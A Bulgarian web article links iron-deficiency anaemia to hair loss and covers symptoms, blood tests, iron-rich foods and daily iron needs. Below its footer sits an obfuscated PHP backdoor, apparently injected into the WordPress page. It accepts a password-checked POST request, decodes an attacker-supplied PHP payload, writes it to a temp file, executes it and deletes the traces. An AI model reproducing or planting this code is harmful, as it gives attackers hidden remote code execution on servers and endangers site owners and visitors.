Косопад вследствие недостиг на желязо | Косопад

Косопад вследствие недостиг на желязо

Желязо срещу анемия и косопад

Желязо срещу анемия и косопад

Жените са особено податливи на дефицит на желязо в някои периоди, като обилна кръвозагуба по време на месечния цикъл или при спазване на тежка диета за отслабване. Когато нивата на този микроелемент спаднат под допустимия минимум се стига до анемия – намалява броят на червените кръвни телца (еритроцити), а те играят важна роля при транспорт на кислород до клетките в организма и така доставят енергията, от която се нуждаете.

Основните симптоми на анемията са бледа кожа, слабост, лесна умора. Също така вторични белези са хронично главоболие, студени крайници, затруднения с концентрацията, недостиг на въздух и не на последно място – косопад.

Анемия и косопад

Древните лечители са казвали, че всяка болест тръгва от кръвта и са били напълно прави. Тази максима играе основна роля за наличие или отсъствие на косопад, понеже именно кръвта е транспортьорът, който носи хранителни вещества до космените фоликули. Ако космите останат без храна за продължителен период естествено загиват и покритието оредява.

Забелязвайки някои от признаците на анемия като косопад, обща слабост или бледа кожа, задължително трябва да си направите изследвания. Диагностицира се чрез кръвен тест за измерване на феритин (протеинът, който съхранява желязото в тялото) и нивото хематокрит (съотношението обема на еритроцитите в цялостната кръвна картина).

Как да се предпазите от косопад заради анемия

На първо място сте длъжни да послушате съветите на лекаря и да приемате предписаните лекарствени препарати. От друга страна спокойно можете да ядете богати на желязо храни като телешко месо, риба, свинско, листни зеленчуци, зърнени закуски и боб. Ефектът се засилва, ако продуктите са богати и на витамин С, който подобрява усвояването на желязо в организма. Много специалисти препоръчват пиене на чай от коприва и изплакване на главата против косопад с отвара, защото тя е много богата на тези микроелементи.

Изчислено е, че жените се нуждаят от по 18 милиграма желязо на ден, а след настъпване на менопаузата по 8 мг.

12. септември 2013 12:58:11 от Косопад
Категории: Косопад – Статии | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}